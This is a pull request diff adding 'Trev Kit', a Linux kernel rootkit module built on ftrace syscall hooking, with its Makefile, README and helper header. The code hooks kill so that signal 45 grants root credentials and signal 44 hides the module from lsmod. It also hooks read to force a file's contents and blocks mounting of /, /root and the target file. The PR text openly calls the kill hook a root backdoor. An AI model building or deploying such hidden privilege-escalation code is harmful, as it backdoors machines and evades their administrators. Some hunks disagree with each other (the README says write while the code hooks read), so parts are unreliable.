### PR TITLE
New Hooks: Mount, Read, Kill

### DIFF
--- a/Ring0/Protecting-Files/Makefile
+++ b/Ring0/Protecting-Files/Makefile
@@ -1,0 +1,10 @@
+obj-m := trev_kit.o 
+CC = gcc -Wall 
+KDIR := /lib/modules/$(shell uname -r)/build
+PWD := $(shell pwd)
+
+all:
+	$(MAKE) -C $(KDIR) M=$(PWD) modules
+
+clean:
+	$(MAKE) -C $(KDIR) M=$(PWD) clean

--- a/Ring0/Protecting-Files/README.md
+++ b/Ring0/Protecting-Files/README.md
@@ -8,7 +8,7 @@
 This kernel module demonstrates how to use ftrace hooking to intercept and modify the behavior of Linux system calls.
 It hooks the following syscalls:
 
-- read → Alters the contents of a specific file (/tmp/data.txt)
+- write → Alters the contents of a specific file (/root/data.txt)
 - mount → Blocks mounting of certain paths
 - kill → Provides hidden commands for toggling module visibility and privilege escalation
 
@@ -20,9 +20,9 @@ kill -44 0 # hides or shows the kit
 kill -45 0 # sets root
 ```
 
- ### The Read Hook 
+ ### The Write Hook 
 
- - The read hook will protect the content of the file under the constant `TARGET_FILE` therefore, preventing modifications to this file even by root user
+ - The write hook will protect the content of the file under the constant `TARGET_FILE` therefore, preventing modifications to this file even by root user
  - The static content of the file is under `DATA` constant hence, only that specific data will be inside that file
 ```bash
 cat /root/data.txt

--- a/Ring0/Protecting-Files/README.md
+++ b/Ring0/Protecting-Files/README.md
@@ -1,0 +1,45 @@
+
+
+# Trev Kit
+
+## 📌 Overview
+
+
+This kernel module demonstrates how to use ftrace hooking to intercept and modify the behavior of Linux system calls.
+It hooks the following syscalls:
+
+- read → Alters the contents of a specific file (/tmp/data.txt)
+- mount → Blocks mounting of certain paths
+- kill → Provides hidden commands for toggling module visibility and privilege escalation
+
+### The Kill Hook 
+
+- The kit will hook the kill sys call to escalate privileges and to make the kit visible (e.g: in `lsmod`)
+```bash
+kill -44 0 # hides or shows the kit
+kill -45 0 # sets root
+```
+
+ ### The Read Hook 
+
+ - The read hook will protect the content of the file under the constant `TARGET_FILE` therefore, preventing modifications to this file even by root user
+ - The static content of the file is under `DATA` constant hence, only that specific data will be inside that file
+```bash
+cat /root/data.txt
+Hello World
+```
+- File size is forced to `DATA_LEN` bytes
+- Reads beyond this length return 0 (EOF) 
+
+### The Mount Hook 
+
+2. Blocking Mounts (Hooking mount)
+
+Prevents mounting sensitive paths:
+
+```bash
+/root/data.txt
+/root
+/
+```
+If either source or target is one of these, the call is denied. 

--- a/Ring0/Protecting-Files/ftrace_helper.h
+++ b/Ring0/Protecting-Files/ftrace_helper.h
@@ -1,0 +1,200 @@
+
+/*  
+ * Helper library for ftrace hooking kernel functions
+ * Author: Harvey Phillips (xcellerator@gmx.com)
+ * License: GPL
+ * */
+
+#include <linux/ftrace.h>
+#include <linux/linkage.h>
+#include <linux/slab.h>
+#include <linux/uaccess.h>
+#include <linux/version.h>
+
+#if defined(CONFIG_X86_64) && (LINUX_VERSION_CODE >= KERNEL_VERSION(4,17,0))
+#define PTREGS_SYSCALL_STUBS 1
+#endif
+
+/*
+ * On Linux kernels 5.7+, kallsyms_lookup_name() is no longer exported, 
+ * so we have to use kprobes to get the address.
+ * Full credit to @f0lg0 for the idea.
+ */
+#if LINUX_VERSION_CODE >= KERNEL_VERSION(5,7,0)
+#define KPROBE_LOOKUP 1
+#include <linux/kprobes.h>
+static struct kprobe kp = {
+    .symbol_name = "kallsyms_lookup_name"
+};
+#endif
+
+#define HOOK(_name, _hook, _orig)   \
+{                   \
+    .name = (_name),        \
+    .function = (_hook),        \
+    .original = (_orig),        \
+}
+
+/* We need to prevent recursive loops when hooking, otherwise the kernel will
+ * panic and hang. The options are to either detect recursion by looking at
+ * the function return address, or by jumping over the ftrace call. We use the 
+ * first option, by setting USE_FENTRY_OFFSET = 0, but could use the other by
+ * setting it to 1. (Ordinarily ftrace provides its own protections against
+ * recursion, but it relies on saving return registers in $rip. We will likely
+ * need the use of the $rip register in our hook, so we have to disable this
+ * protection and implement our own).
+ * */
+#define USE_FENTRY_OFFSET 0
+#if !USE_FENTRY_OFFSET
+#pragma GCC optimize("-fno-optimize-sibling-calls")
+#endif
+
+/* We pack all the information we need (name, hooking function, original function)
+ * into this struct. This makes it easier for setting up the hook and just passing
+ * the entire struct off to fh_install_hook() later on.
+ * */
+struct ftrace_hook {
+    const char *name;
+    void *function;
+    void *original;
+
+    unsigned long address;
+    struct ftrace_ops ops;
+};
+
+/* Ftrace needs to know the address of the original function that we
+ * are going to hook. As before, we just use kallsyms_lookup_name() 
+ * to find the address in kernel memory.
+ * */
+static int fh_resolve_hook_address(struct ftrace_hook *hook)
+{
+#ifdef KPROBE_LOOKUP
+    typedef unsigned long (*kallsyms_lookup_name_t)(const char *name);
+    kallsyms_lookup_name_t kallsyms_lookup_name;
+    register_kprobe(&kp);
+    kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr;
+    unregister_kprobe(&kp);
+#endif
+    hook->address = kallsyms_lookup_name(hook->name);
+
+    if (!hook->address)
+    {
+        printk(KERN_DEBUG "rootkit: unresolved symbol: %s\n", hook->name);
+        return -ENOENT;
+    }
+
+#if USE_FENTRY_OFFSET
+    *((unsigned long*) hook->original) = hook->address + MCOUNT_INSN_SIZE;
+#else
+    *((unsigned long*) hook->original) = hook->address;
+#endif
+
+    return 0;
+}
+
+/* See comment below within fh_install_hook() */
+static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip, struct ftrace_ops *ops, struct pt_regs *regs)
+{
+    struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
+
+#if USE_FENTRY_OFFSET
+    regs->ip = (unsigned long) hook->function;
+#else
+    if (!within_module(parent_ip, THIS_MODULE))
+        regs->ip = (unsigned long) hook->function;
+#endif
+}
+
+/* Assuming we've already set hook->name, hook->function and hook->original, we 
+ * can go ahead and install the hook with ftrace. This is done by setting the 
+ * ops field of hook (see the comment below for more details), and then using
+ * the built-in ftrace_set_filter_ip() and register_ftrace_function() functions
+ * provided by ftrace.h
+ * */
+int fh_install_hook(struct ftrace_hook *hook)
+{
+    int err;
+    err = fh_resolve_hook_address(hook);
+    if(err)
+        return err;
+
+    /* For many function hooks (especially non-trivial ones), the $rip
+     * register gets modified, so we have to alert ftrace to this fact. This
+     * is the reason for the SAVE_REGS and IP_MODIFY flags. However, we also
+     * need to OR the RECURSION_SAFE flag (effectively turning it OFF) because
+     * the built-in anti-recursion guard provided by ftrace is useless if
+     * we're modifying $rip. This is why we have to implement our own checks
+     * (see USE_FENTRY_OFFSET). */
+    hook->ops.func = (ftrace_func_t)fh_ftrace_thunk;
+    hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS
+	   | FTRACE_OPS_FL_RECURSION
+            | FTRACE_OPS_FL_IPMODIFY;
+
+    err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0);
+    if(err)
+    {
+        printk(KERN_DEBUG "rootkit: ftrace_set_filter_ip() failed: %d\n", err);
+        return err;
+    }
+
+    err = register_ftrace_function(&hook->ops);
+    if(err)
+    {
+        printk(KERN_DEBUG "rootkit: register_ftrace_function() failed: %d\n", err);
+        return err;
+    }
+
+    return 0;
+}
+
+/* Disabling our function hook is just a simple matter of calling the built-in
+ * unregister_ftrace_function() and ftrace_set_filter_ip() functions (note the
+ * opposite order to that in fh_install_hook()).
+ * */
+void fh_remove_hook(struct ftrace_hook *hook)
+{
+    int err;
+    err = unregister_ftrace_function(&hook->ops);
+    if(err)
+    {
+        printk(KERN_DEBUG "rootkit: unregister_ftrace_function() failed: %d\n", err);
+    }
+
+    err = ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0);
+    if(err)
+    {
+        printk(KERN_DEBUG "rootkit: ftrace_set_filter_ip() failed: %d\n", err);
+    }
+}
+
+/* To make it easier to hook multiple functions in one module, this provides
+ * a simple loop over an array of ftrace_hook struct
+ * */
+int fh_install_hooks(struct ftrace_hook *hooks, size_t count)
+{
+    int err;
+    size_t i;
+
+    for (i = 0 ; i < count ; i++)
+    {
+        err = fh_install_hook(&hooks[i]);
+        if(err)
+            goto error;
+    }
+    return 0;
+
+error:
+    while (i != 0)
+    {
+        fh_remove_hook(&hooks[--i]);
+    }
+    return err;
+}
+
+void fh_remove_hooks(struct ftrace_hook *hooks, size_t count)
+{
+    size_t i;
+
+    for (i = 0 ; i < count ; i++)
+        fh_remove_hook(&hooks[i]);
+}

--- a/Ring0/Protecting-Files/trev_kit.c
+++ b/Ring0/Protecting-Files/trev_kit.c
@@ -24,7 +24,7 @@ MODULE_AUTHOR("Trevohack");
 MODULE_DESCRIPTION("Hook read, kill and mount to protect content of a file"); 
 MODULE_VERSION("0.02");
 
-#define TARGET_FILE "/tmp/data.txt"
+#define TARGET_FILE "/root/data.txt" 
 #define DATA "Hello World\n"
 #define DATA_LEN (strlen(DATA))
 

--- a/Ring0/Protecting-Files/trev_kit.c
+++ b/Ring0/Protecting-Files/trev_kit.c
@@ -1,0 +1,221 @@
+
+/* 
+
+Note: This kit uses ftrace_helper 
+Author: Trevohack 
+
+*/
+
+
+#include <linux/module.h> 
+#include <linux/kernel.h> 
+#include <linux/cred.h> 
+#include <linux/fs.h>       
+#include <linux/uaccess.h> 
+#include <linux/slab.h>   
+#include <linux/dcache.h> 
+#include <linux/file.h> 
+#include <linux/ptrace.h>
+
+#include "ftrace_helper.h"
+
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("Trevohack");
+MODULE_DESCRIPTION("Hook read, kill and mount to protect content of a file"); 
+MODULE_VERSION("0.02");
+
+#define TARGET_FILE "/tmp/data.txt"
+#define DATA "Hello World\n"
+#define DATA_LEN (strlen(DATA))
+
+static struct list_head *prev_module;
+static short hidden = 0;
+
+
+static asmlinkage long (*orig_mount)(const struct pt_regs *);
+static asmlinkage long (*orig_kill)(const struct pt_regs *);
+static asmlinkage long (*orig_read)(const struct pt_regs *);
+
+
+asmlinkage long hook_mount(const struct pt_regs *regs)
+{
+    char __user *source = (void *)regs->si;
+    char __user *target = (void *)regs->di;
+
+    char *target_buf;
+    char *source_buf;
+
+    target_buf = kmalloc(PATH_MAX, GFP_KERNEL);
+    if (!target_buf) return -ENOMEM;
+    
+    source_buf = kmalloc(PATH_MAX, GFP_KERNEL);
+    if (!source_buf){
+        kfree(target_buf);
+        return -ENOMEM;
+    }
+    
+
+    if (copy_from_user(source_buf, source, PATH_MAX)){
+        kfree(source_buf);
+        kfree(target_buf);
+        return -EFAULT;
+    }
+
+    if (copy_from_user(target_buf, target, PATH_MAX)){
+        kfree(source_buf);
+        kfree(target_buf);
+        return -EFAULT;
+    }
+
+    if (   strcmp(source_buf, TARGET_FILE) == 0 || strcmp(source_buf, "/root") == 0
+        || strcmp(source_buf, "/")         == 0 || strcmp(target_buf, TARGET_FILE) == 0 
+        || strcmp(target_buf, "/root")     == 0 || strcmp(target_buf, "/") == 0)  {
+        
+        kfree(source_buf);
+        kfree(target_buf);
+        return 0;
+    }
+
+    kfree(source_buf);
+    kfree(target_buf);
+    return orig_mount(regs);
+}
+
+asmlinkage long hook_kill(const struct pt_regs *regs)
+{
+    int sig = regs->si;
+    void showme(void);
+    void hideme(void);
+    void set_root(void);
+
+    if (sig == 44 && hidden == 0) {
+        hideme();
+        hidden = 1;
+        return 0;
+    } else if (sig == 44 && hidden == 1) {
+        showme();
+        hidden = 0;
+        return 0;
+    } else if (sig == 45) {
+        set_root();
+        return 0;
+    }
+
+    return orig_kill(regs);
+}
+
+
+asmlinkage ssize_t hook_read(struct pt_regs *regs){
+   struct file *file;
+   char *buff;
+   char *absolute_path;
+   
+   unsigned int fd = regs->si;
+   char __user *buf = (void *) regs->di;
+   size_t count = regs->dx;
+
+   file = fget(fd);
+   if (!file) return -EBADF;
+
+   buff = kmalloc(PATH_MAX, GFP_KERNEL);
+   if (!buff){
+        fput(file);
+        return -ENOMEM;
+   }
+   
+   absolute_path = dentry_path_raw(file->f_path.dentry, buff, PATH_MAX);
+
+   if (strcmp(absolute_path, TARGET_FILE) == 0){
+        loff_t pos;
+        ssize_t ret;
+
+        // make the file size equal to DATA_LEN
+        // even if the file had nothing or less that
+        // DATA len the len will always be equal 
+        // to DATA_LEN
+        vfs_truncate(&file->f_path, DATA_LEN);
+
+        pos = file->f_pos;
+
+        // this is cause no more bytes can be read
+        // and we use this to indicate EOF (end of file) 
+        if (pos ==  DATA_LEN){
+           ret = 0; 
+           goto done;
+        } 
+
+        if (count > DATA_LEN) count = DATA_LEN;
+        count = count  - pos;
+        
+        if (copy_to_user(buf, DATA, DATA_LEN)){
+            ret = -EFAULT;
+            goto done;
+        }
+
+        file->f_pos += count;
+        ret = count;
+        goto done;
+
+       done:
+            kfree(buff);
+            fput(file);
+            return ret;
+
+   }
+
+   kfree(buff);
+   fput(file);
+   return orig_read(regs);
+}
+
+
+void showme(void)
+{
+    list_add(&THIS_MODULE->list, prev_module);
+}
+
+void hideme(void)
+{
+    prev_module = THIS_MODULE->list.prev;
+    list_del(&THIS_MODULE->list);
+}
+
+void set_root(void)
+{
+    struct cred *root;
+    root = prepare_creds();
+
+    if (root == NULL)
+        return;
+
+    root->uid.val = root->gid.val = 0;
+    root->euid.val = root->egid.val = 0;
+    root->suid.val = root->sgid.val = 0;
+    root->fsuid.val = root->fsgid.val = 0;
+    commit_creds(root);
+}
+
+
+static struct ftrace_hook hooks[] = {
+    HOOK("sys_read", hook_read, &orig_read),
+    HOOK("sys_mount", hook_mount, &orig_mount),
+    HOOK("sys_kill", hook_kill, &orig_kill),
+};
+
+static int trev_init(void)
+{
+    int err;
+    err = fh_install_hooks(hooks, ARRAY_SIZE(hooks));
+    if (err)
+        return err;
+
+    return 0;
+}
+
+static void trev_exit(void)
+{
+    fh_remove_hooks(hooks, ARRAY_SIZE(hooks));
+}
+
+module_init(rootkit_init);
+module_exit(rootkit_exit);

--- a/Ring0/Protecting-Files/trev_kit.c
+++ b/Ring0/Protecting-Files/trev_kit.c
@@ -15,9 +15,9 @@ MODULE_AUTHOR("Trevohack");
 MODULE_DESCRIPTION("LKM Library");
 MODULE_VERSION("0.02");
 
-#define TARGET_FILE "/root/king.txt"
-#define USERNAME "Trevohack\n"
-#define USERNAME_LEN (strlen(USERNAME))
+#define TARGET_FILE "/root/data.txt"
+#define DATA "data\n"
+#define DATA_LEN (strlen(DATA))
 
 static struct list_head *prev_module;
 static short hidden = 0;
@@ -119,25 +119,25 @@ asmlinkage ssize_t hook_read(struct pt_regs *regs){
         loff_t pos;
         ssize_t ret;
 
-        // make the file size equal to USERNAME_LEN
+        // make the file size equal to DATA_LEN
         // even if the file had nothing or less that
-        // username len the len will always be equal 
-        // to USERNAME_LEN
-        vfs_truncate(&file->f_path, USERNAME_LEN);
+        // DATA len the len will always be equal 
+        // to DATA_LEN
+        vfs_truncate(&file->f_path, DATA_LEN);
 
         pos = file->f_pos;
 
         // this is cause no more bytes can be read
         // and we use this to indicate EOF (end of file)
-        if (pos ==  USERNAME_LEN){
+        if (pos ==  DATA_LEN){
            ret = 0; 
            goto done;
         } 
 
-        if (count > USERNAME_LEN) count = USERNAME_LEN;
+        if (count > DATA_LEN) count = DATA_LEN;
         count = count  - pos;
         
-        if (copy_to_user(buf, USERNAME, USERNAME_LEN)){
+        if (copy_to_user(buf, DATA, DATA_LEN)){
             ret = -EFAULT;
             goto done;
         }

--- a/Ring0/Protecting-Files/trev_kit.c
+++ b/Ring0/Protecting-Files/trev_kit.c
@@ -217,5 +217,5 @@ static void trev_exit(void)
     fh_remove_hooks(hooks, ARRAY_SIZE(hooks));
 }
 
-module_init(rootkit_init);
-module_exit(rootkit_exit);
+module_init(trev_init);
+module_exit(trev_exit);


### PR DESCRIPTION
- A small LKM library that demonstrates file protection by preventing mount calls, and modification to the file by hooking the read sys call, also hides itself from lsmod output, and sets a backdoor to root (hooking kill) 